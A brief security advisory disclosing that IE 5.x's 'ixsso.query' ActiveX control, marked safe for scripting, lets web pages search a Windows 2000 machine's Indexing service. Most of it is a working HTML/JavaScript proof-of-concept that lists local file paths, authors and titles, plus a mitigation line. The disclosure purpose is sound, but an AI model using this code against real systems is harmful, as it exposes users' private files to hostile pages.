COMMAND
Indexing service
SYSTEMS AFFECTED
IE 5.x Win2000
PROBLEM
Georgi Guninski found following. There is a security
vulnerability in IE 5.x/Outlook/Outlook on Windows 2000 with
Indexing service started (it is not started by default) which
allows searching for files with specific name (wildcards are
allowed) or content. Combined with other local file reading
vulnerabilities this may be danegorous, especially the feature of
searching for files that contain certain content.
The problem is the "ixsso.query" ActiveXObject which is used to
query the Indexing service and surprisingly it is marked safe for
scripting. The code is:
<INPUT TYPE="BUTTON" VALUE="Search"
onclick="g(document.all.query.value)">
<INPUT TYPE="BUTTON" VALUE="Find *.txt files" onclick="g('@filename = *.txt')">
<BR>
<SCRIPT>
function g(q1)
{
qu=new ActiveXObject("ixsso.query");
qu.Catalog="System";
//qu.query="@contents name";
//qu.query="#filename .htm or name near test";
//qu.query='@filename = *.doc ';
qu.query=q1;
qu.Columns="filename, path, doctitle, doccomments, docauthor, size";
rs=qu.CreateRecordset("nonsequential");
//alert("Records: "+rs.RecordCount);
doc=window.frames[0].document;
doc.writeln("SEARCH RESULTS Records: "+rs.RecordCount+"<BR>");
doc.writeln("<TABLE BORDER=2>");
doc.writeln("<TR><TD>Path</TD><TD>size</TD><TD>DocAuthor</TD><TD>DocTitle</TD></TR>");
while (!rs.EOF)
{
doc.writeln("<TR><TD><A TARGET='_blank' HREF='file://"+rs("Path")+"'</A>"+rs("Path")+"</TD><TD>"+rs("size")+"</TD><TD>"+rs("DocAuthor")+"</TD><TD>"+rs("DocTitle")+"</TD></TR>");
rs.MoveNext();
}
doc.writeln("</TABLE>");
}
//setTimeout("g()",1000);
</SCRIPT>
<IFRAME WIDTH=700 HEIGHT=400 SRC="about:blank"></IFRAME>
Demonstration is available at:
http://www.guninski.com/indexserv1.html
SOLUTION
Disable Active Scripitng or Indexing service.